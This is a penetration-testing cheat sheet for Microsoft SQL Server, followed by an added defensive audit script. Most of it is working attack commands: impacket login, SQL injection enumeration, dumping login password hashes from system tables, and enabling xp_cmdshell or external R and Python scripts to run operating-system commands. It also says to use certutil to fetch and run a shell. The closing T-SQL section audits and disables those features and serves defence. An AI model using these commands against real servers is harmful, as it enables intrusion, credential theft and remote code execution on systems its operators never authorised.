Connecting

To connect to open port 1433:
impacket-mssqlclient -p 1433 -windows-auth domain/user:pass@IP

Querying / Exploiting

For MySQL/MSSQL: select @@version returns the version; other DBMSs will error

Check how many columns there are: order by x, keep increasing x until it errors. The last number that works is the number of columns

Concatenating (concat joins two values together; STRING_AGG puts all the values of a column into one string): concat(name1,':',name2) or STRING_AGG(column_name, ',') (only 2017+)

To comment out the rest of the line, use xx--

Show all databases: SELECT name FROM master..sysdatabases;
Show the current database: SELECT DB_NAME()

Show the table names: SELECT name FROM master..sysobjects WHERE xtype = 'U';
(change xtype to 'V' to list views as well)
Or for another DB: SELECT name FROM someotherdb..sysobjects WHERE xtype = 'U';

Show the column names if the table name is mytable:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
(For current DB only)

Finally, read the table contents: select * from db..table;

See which user: SELECT system_user; OR SELECT user_name();

Check the permissions you have: SELECT * from sys.fn_my_permissions(null, 'database')

Password hash:
MSSQL 2000: SELECT name, password FROM master..sysxlogins
MSSQL 2005: SELECT name, password_hash FROM master.sys.sql_logins
Note: If that doesn't work as expected, convert the binary value to a hex string:
MSSQL 2000: SELECT name, master.dbo.fn_varbintohexstr(password) FROM master..sysxlogins
MSSQL 2005: SELECT name + ':' + master.sys.fn_varbintohexstr(password_hash) from master.sys.sql_logins

Check if you are sysadmin: SELECT is_srvrolemember('sysadmin');

XP_CMDSHELL (if you are doing SQL injection, put a valid query first, then ; as a separator, then all of the following; in the end use certutil to download a shell and run it):
EXECUTE sp_configure 'show advanced options', 1;
reconfigure;
EXECUTE sp_configure 'xp_cmdshell', 1;
reconfigure;
EXEC xp_cmdshell 'dir';

If you can execute external scripts, you can run commands through R or Python using the following:
R: EXEC sp_execute_external_script @language=N'R', @script=N'OutputDataSet <- data.frame(system("cmd.exe /c ipconfig",intern=T))' WITH RESULT SETS (([cmd_out] text));
Python: EXECUTE sp_execute_external_script @language = N'Python', @script = N'print(__import__("os").system("ipconfig"))'
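
Defender's view of the XP_CMDSHELL and external script notes above, as an added example that is not part of the original notes: a T-SQL audit of whether those features are enabled, who can enable or use them, and how to switch them off. It assumes a DBA login that can see all server principals and SQL Server 2016 or later (older versions have no 'external scripts enabled' option).

```sql
-- Added audit example, not from the original notes.
-- Assumption: run by a DBA login; SQL Server 2016+ for the external script option.

-- 1. Are the command-execution features switched on right now?
--    value is what was configured, value_in_use is what the engine is running with.
SELECT name,
       CAST(value AS int)        AS configured_value,
       CAST(value_in_use AS int) AS running_value
FROM sys.configurations
WHERE name IN ('show advanced options', 'xp_cmdshell', 'external scripts enabled');

-- 2. Who can flip those options? sp_configure changes need ALTER SETTINGS,
--    which the sysadmin and serveradmin fixed server roles hold implicitly.
SELECT r.name AS role_name, m.name AS login_name, m.type_desc, m.is_disabled
FROM sys.server_role_members AS rm
JOIN sys.server_principals AS r ON r.principal_id = rm.role_principal_id
JOIN sys.server_principals AS m ON m.principal_id = rm.member_principal_id
WHERE r.name IN ('sysadmin', 'serveradmin')
ORDER BY r.name, m.name;

-- 3. Who may call sp_execute_external_script in the current database?
--    Repeat per database; the permission is granted at database level.
SELECT pr.name AS principal_name, pe.state_desc, pe.permission_name
FROM sys.database_permissions AS pe
JOIN sys.database_principals AS pr ON pr.principal_id = pe.grantee_principal_id
WHERE pe.permission_name = 'EXECUTE ANY EXTERNAL SCRIPT';

-- 4. Switch both features off if nothing legitimate depends on them,
--    then hide the advanced options again.
EXECUTE sp_configure 'show advanced options', 1;
RECONFIGURE;
EXECUTE sp_configure 'xp_cmdshell', 0;
EXECUTE sp_configure 'external scripts enabled', 0;  -- errors on versions before 2016
RECONFIGURE;
EXECUTE sp_configure 'show advanced options', 0;
RECONFIGURE;
```

Each sp_configure change is also written to the SQL Server error log as a "Configuration option 'xp_cmdshell' changed from 0 to 1" message, which is worth alerting on. Rerun query 1 after step 4 to confirm running_value is 0; for 'external scripts enabled' it may not change until the service restarts.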